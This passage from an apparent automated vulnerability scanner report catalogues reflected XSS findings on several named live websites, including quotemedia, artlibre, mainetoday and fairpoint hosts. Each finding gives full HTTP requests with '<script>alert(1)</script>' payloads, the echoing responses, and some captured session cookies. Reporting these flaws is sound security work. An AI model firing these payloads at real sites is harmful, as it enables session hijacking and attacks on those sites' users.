Path:   /quotetools/miniCharts.go

Issue detail

The value of the chhig request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c490b><script>alert(1)</script>a1948d55344 was submitted in the chhig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100c490b><script>alert(1)</script>a1948d55344&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=h1jI8d2klS3e; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:11:53 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
g_2687\" width=\"268\" height=\"150\" border=\"0\" \n\n src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100c490b><script>alert(1)</script>a1948d55344&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.14. http://app.quotemedia.com/quotetools/miniCharts.go [chln parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chln request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c9855><script>alert(1)</script>2ee7aa2709a was submitted in the chln parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111c9855><script>alert(1)</script>2ee7aa2709a&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=frWQwFe13uw_; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:11:57 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111c9855><script>alert(1)</script>2ee7aa2709a&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.15. http://app.quotemedia.com/quotetools/miniCharts.go [chln parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chln request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70327</script><script>alert(1)</script>8a04d5aa93a was submitted in the chln parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=11111170327</script><script>alert(1)</script>8a04d5aa93a&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=fSDVxqwMB8A_; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:00 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=11111170327</script><script>alert(1)</script>8a04d5aa93a&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_1555() {\n\n window.location.href='http://app.quotemedia.com/quotetools/clientForward?targetsym=&targetex=&targettype=&qmpage=true&targetURL=n
...[SNIP]...

1.16. http://app.quotemedia.com/quotetools/miniCharts.go [chtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chtype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e8af</script><script>alert(1)</script>fd4234cbdcc was submitted in the chtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain8e8af</script><script>alert(1)</script>fd4234cbdcc&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=gmdUi7MvHLdc; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:24 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
0px' : '1px';\n\n }\n\n\n\n document.getElementById('qm_img_3314').src = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain8e8af</script><script>alert(1)</script>fd4234cbdcc&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_3314() {\n\n window.location.href='http:
...[SNIP]...

1.17. http://app.quotemedia.com/quotetools/miniCharts.go [chtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chtype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 96f43><script>alert(1)</script>820cb7f65c0 was submitted in the chtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain96f43><script>alert(1)</script>820cb7f65c0&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=hIzLPsSYrmJ8; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:21 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
<img id=\"qm_img_4856\" width=\"268\" height=\"100\" border=\"0\" \n\n src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain96f43><script>alert(1)</script>820cb7f65c0&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.18. http://artlibre.org/licence/lalgb.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a163d<script>alert(1)</script>5163a950221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licencea163d<script>alert(1)</script>5163a950221/lalgb.html HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:12:05 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 30 Nov 2010 14:12:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licencea163d<script>alert(1)</script>5163a950221/lalgb.html</a>
...[SNIP]...

1.19. http://artlibre.org/licence/lalgb.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1132c<script>alert(1)</script>ac5c4028cf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licence/1132c<script>alert(1)</script>ac5c4028cf7 HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:12:07 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 30 Nov 2010 14:12:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licence/1132c<script>alert(1)</script>ac5c4028cf7</a>
...[SNIP]...

1.20. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://centralmaine.mainetoday.com
Path:   /sports/hsblog/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0c39<script>alert(1)</script>9a20a89349a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsd0c39<script>alert(1)</script>9a20a89349a/hsblog/index.xml HTTP/1.1
Host: centralmaine.mainetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:01:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 445
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Error 404</title>
<style type="text/css">
body {
background-color:#efefef;
color:#999999;
}
</style>
</head>
<body>
<div align="center">
<h1>Error 404<
...[SNIP]...
</b> /sportsd0c39<script>alert(1)</script>9a20a89349a/hsblog/index.xml<p />
...[SNIP]...

1.21. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://centralmaine.mainetoday.com
Path:   /sports/hsblog/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1aa9a<script>alert(1)</script>a6dbd8f512 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/hsblog1aa9a<script>alert(1)</script>a6dbd8f512/index.xml HTTP/1.1
Host: centralmaine.mainetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:01:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 444
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Error 404</title>
<style type="text/css">
body {
background-color:#efefef;
color:#999999;
}
</style>
</head>
<body>
<div align="center">
<h1>Error 404<
...[SNIP]...
</b> /sports/hsblog1aa9a<script>alert(1)</script>a6dbd8f512/index.xml<p />
...[SNIP]...

1.22. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://centralmaine.mainetoday.com
Path:   /sports/hsblog/index.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7291c<script>alert(1)</script>95be12b553a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/hsblog/index.xml7291c<script>alert(1)</script>95be12b553a HTTP/1.1
Host: centralmaine.mainetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:01:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 445
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Error 404</title>
<style type="text/css">
body {
background-color:#efefef;
color:#999999;
}
</style>
</head>
<body>
<div align="center">
<h1>Error 404<
...[SNIP]...
</b> /sports/hsblog/index.xml7291c<script>alert(1)</script>95be12b553a<p />
...[SNIP]...

1.23. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://centralmaine.mainetoday.com
Path:   /sports/hsblog/index.xml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 74e45<script>alert(1)</script>d950b462e72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/hsblog/index.xml?74e45<script>alert(1)</script>d950b462e72=1 HTTP/1.1
Host: centralmaine.mainetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 30 Nov 2010 14:01:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 448
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Error 404</title>
<style type="text/css">
body {
background-color:#efefef;
color:#999999;
}
</style>
</head>
<body>
<div align="center">
<h1>Error 404<
...[SNIP]...
</b> /sports/hsblog/index.xml?74e45<script>alert(1)</script>d950b462e72=1<p />
...[SNIP]...

1.24. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe ['%22--%3E%3Cscript%3Ealert(0x000182)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://crmext.fairpoint.com
Path:   /eCustomerReg_enu/start.swe

Issue detail

The value of the '%22--%3E%3Cscript%3Ealert(0x000182)%3C/script%3E request parameter is copied into the HTML document as plain text between tags. The payload e62f7<script>alert(1)</script>ed21b27f2b3 was submitted in the '%22--%3E%3Cscript%3Ealert(0x000182)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eCustomerReg_enu/start.swe?'%22--%3E%3Cscript%3Ealert(0x000182)%3C/script%3Ee62f7<script>alert(1)</script>ed21b27f2b3 HTTP/1.1
Host: crmext.fairpoint.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=35652279.996491807.1291129174.1291129174.1291129174.1; __utmc=35652279; __utmz=35652279.1291129174.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ObSSOCookie=loggedoutcontinue; __utmb=35652279

Response

HTTP/1.1 200 OK
Date: Tue, 30 Nov 2010 14:18:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Set-Cookie: _sn=MQNYdO3DE22Tu.iQf1kPWAA7h-Wv6KSgSUPptnTAmvI_; Version=1; Path=/eCustomerReg_enu
Content-Length: 571

<html><body><form action="/eCustomerReg_enu/start.swe" method="GET" name="RedirectForHost"><input type = "hidden" name="_sn" value="MQNYdO3DE22Tu.iQf1kPWAA7h-Wv6KSgSUPptnTAmvI_">
<input type = "hidde
...[SNIP]...
</script>e62f7<script>alert(1)</script>ed21b27f2b3" value="">
...[SNIP]...

1.25. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe ['%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://crmext.fairpoint.com
Path:   /eCustomerReg_enu/start.swe

Issue detail

The value of the '%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E request parameter is copied into the HTML document as plain text between tags. The payload ffc2f<script>alert(1)</script>17022155750 was submitted in the '%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eCustomerReg_enu/start.swe?'%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effc2f<script>alert(1)</script>17022155750 HTTP/1.1
Host: crmext.fairpoint.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=35652279.996491807.1291129174.1291129174.1291129174.1; __utmc=35652279; __utmz=35652279.1291129174.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ObSSOCookie=loggedoutcontinue; __utmb=35652279

Response

HTTP/1.1 200 OK
Date: Tue, 30 Nov 2010 14:15:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Set-Cookie: _sn=SeeFTKGIJmpeelIVDtf2BSIl3TmwfKQn35ZgVA7uJe0_; Version=1; Path=/eCustomerReg_enu
Content-Length: 578

<html><body><form action="/eCustomerReg_enu/start.swe" method="GET" name="RedirectForHost"><input type = "hidden" name="_sn" value="SeeFTKGIJmpeelIVDtf2BSIl3TmwfKQn35ZgVA7uJe0_">
<input type = "hidde
...[SNIP]...
</script>ffc2f<script>alert(1)</script>17022155750" value="">
...[SNIP]...

1.26. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://crmext.fairpoint.com
Path:   /eCustomerReg_enu/start.swe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e738"><script>alert(1)</script>39003435130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eCustomerReg_enu/start.swe?'%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&1e738"><script>alert(1)</script>39003435130=1 HTTP/1.1
Host: crmext.fairpoint.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=35652279.996491807.1291129174.1291129174.1291129174.1; __utmc=35652279; __utmz=35652279.1291129174.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ObSSOCookie=loggedoutcontinue; __utmb=35652279

Response

HTTP/1.1 200 OK
Date: Tue, 30 Nov 2010 14:15:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Set-Cookie: _sn=6vBs3Z624NZIe2ycGCR1jatun5tGFazEP8yZedlhVgE_; Version=1; Path=/eCustomerReg_enu
Content-Length: 623

<html><body><form action="/eCustomerReg_enu/start.swe" method="GET" name="RedirectForHost"><input type = "hidden" name="_sn" value="6vBs3Z624NZIe2ycGCR1jatun5tGFazEP8yZedlhVgE_">
<input type = "hidde
...[SNIP]...
<input type = "hidden" name="1e738"><script>alert(1)</script>39003435130" value="1">
...[SNIP]...

1.27. http://myfairpoint.net/fairpoint/portal/NewsChannel.aspx [ArticleID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myfairpoint.net
Path:   /fairpoint/portal/NewsChannel.aspx

Issue detail

The value of the ArticleID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10271"%3balert(1)//0e62cd76bbc was submitted in the ArticleID parameter. This input was echoed as 10271";alert(1)//0e62cd76bbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fairpoint/portal/NewsChannel.aspx?ArticleID=D9JQFHJ0010271"%3balert(1)//0e62cd76bbc&CatID=Entertainment HTTP/1.1
Host: myfairpoint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://myfairpoint.net/fairpoint/portal/entertainmentch.aspx
Cookie: __utmz=109326873.1291129547.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DomainUserProfile=AnonymousId=4b4a49d0ac0c4e17abb520966490cb01&LastSeenDateTime=11/30/2010 2:10:05 PM&IssueDateTime=11/30/2010 2:07:06 PM&CookieDomain=.myfairpoint.net; DomainSession=TransactionId=0e5abbe1af094afba4fd20966490cb01&SessionId=8d3664a1d22c49c69e8920966490cb01&PrevActionId=9c63c88e52144f44b1ea20966490cb01&ActionId=0ab7f213101c4afd87a320966490cb01&CookieDomain=.myfairpoint.net; mitiktaun=553817354.20480.0000; __utma=109326873.1156949127.1291129547.1291129547.1291129547.1; __utmc=109326873; __utmb=109326873.1.10.1291129547; ASP.NET_SessionId=c3yueh554ngktnm5y5h24s45; EncryptedSession=HxD824yasSxTfrN3cj0krxEVUeKZgYb9IDd4S47aaKhp/dXj83LOiONASJRlLnREJqWqdebhfC3i2hPDfWbysA==; .ASPXANONYMOUS=k1s-K6xMzXBjCY4Qfjys64aCRUanMtDlkYcrRW2ly8OEPmOeIOnj9CybuVZXgYzURXVb0ran1ar9voYlpI851tubHpB5Bj-fYEodwMCcekGm8bS77C1YWZYdZru5q7WCDSmSAS72b5ceC8B3ReZO1nAy7C9JcuUjBENIn3YhhW8_cxS30;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Nov 2010 14:20:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=0e5abbe1af094afba4fd20966490cb01&SessionId=8d3664a1d22c49c69e8920966490cb01&PrevActionId=0ab7f213101c4afd87a320966490cb01&ActionId=60f56650ed1049a1a81420966490cb01&CookieDomain=.myfairpoint.net; domain=.myfairpoint.net; expires=Tue, 30-Nov-2010 14:40:47 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=4b4a49d0ac0c4e17abb520966490cb01&LastSeenDateTime=11/30/2010 2:20:47 PM&IssueDateTime=11/30/2010 2:07:06 PM&CookieDomain=.myfairpoint.net; domain=.myfairpoint.net; expires=Thu, 06-Nov-2110 14:20:47 GMT; path=/
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 56105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="Head1"><title
...[SNIP]...
Reader()
{
$create(Portal.NewsChannel.NewsReader,{category:"Entertainment",categoryDisplayName:"Entertainment news",topHeadlineCount:5,articleID:"D9JQFHJ0010271";alert(1)//0e62cd76bbc",categoryURL:"Entertainment"},{showQuickRead:showModalPopup},null,$get("NewsReaderContainer"));
}
Sys.Application.add_load(createNewsReader);

...[SNIP]...

1.28. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [Referer HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://centralmaine.mainetoday.com
Path:   /sports/hsblog/index.xml

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f903"><script>alert(1)</script>5f03991dd7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

